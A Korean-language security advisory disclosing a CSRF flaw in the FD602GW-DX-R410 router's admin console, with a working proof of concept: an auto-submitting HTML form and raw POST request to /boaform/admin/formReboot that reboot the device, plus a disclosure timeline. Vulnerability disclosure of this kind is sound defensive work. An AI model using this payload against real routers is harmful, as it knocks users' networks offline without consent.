
FD602GW-DX-R410 라우터의 CSRF 취약점으로 인해 인증된 관리자가 있을 때 원격 공격자가 /boaform/admin/formReboot로 조작된 POST 요청을 통해 장치를 재부팅할 수 있습니다.
FD602GW-DX-R410 광섬유 라우터의 관리 인터페이스(펌웨어 V2.2.14)에서 발견된 CSRF(Cross-Site Request Forgery) 취약점에 대한 개념 증명 및 보안 권고입니다. 이 권고는 영향, 공격 벡터 및 해결 방법을 설명합니다.
FD602GW-DX-R410 라우터의 CSRF 취약점으로 인해 인증된 관리자가 있는 경우 원격 공격자가 /boaform/admin/formReboot로 조작된 POST 요청을 보내 장치를 재부팅할 수 있습니다.
FD602GW-DX-R410 광섬유 라우터의 웹 기반 관리 콘솔(펌웨어 V2.2.14)에서 CSRF(Cross-Site Request Forgery) 취약점이 발견되었습니다. /boaform/admin/formReboot 엔드포인트는 CSRF 토큰이나 출처 검증 없이 POST 요청을 통해 장치 전체를 재부팅할 수 있습니다. 인증된 관리자가 악성 페이지를 방문하면 동의 없이 라우터가 원격으로 재부팅될 수 있습니다.
/boaform/admin/formReboot<html>
<!-- CSRF PoC - generated by Burp Suite Pro -->
<body>
<form action="http://192.168.1.1/boaform/admin/formReboot" method="POST">
<input type="hidden" name="postSecurityFlag" value="+65535" />
<input type="submit" value="Submit" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
POST /boaform/admin/formReboot HTTP/1.1
Host: 192.168.1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
postSecurityFlag=+65535
HTTP 200 OK; 라우터가 즉시 재부팅됩니다.
라우터 관리자가 인증(로그인)되어 있어야 합니다. 공격자는 피해자를 악성 웹페이지로 유인하여 재부팅 엔드포인트에 대한 POST 요청을 조용히 트리거합니다. 라우터는 위조된 요청을 수락하고 즉시 재부팅되어 서비스 거부를 유발합니다.
| Date | Action |
|---|---|
| Jun 2025 | 취약점 발견 |
| Jun 2025 | 책임 있는 공개 시도 (응답 없음) |
| Jul 2025 | MITRE에 CVE ID 요청 |
| Jul 2025 | 권고 준비 및 게시 대기 중 |
| Sep 2025 | CVE 할당, 권고 공개 |
이 권고는 교육 및 보안 인식 목적으로 제공됩니다. 작성자는 오용에 대한 책임을 지지 않습니다. 모든 테스트는 통제된 환경에서 수행되었습니다.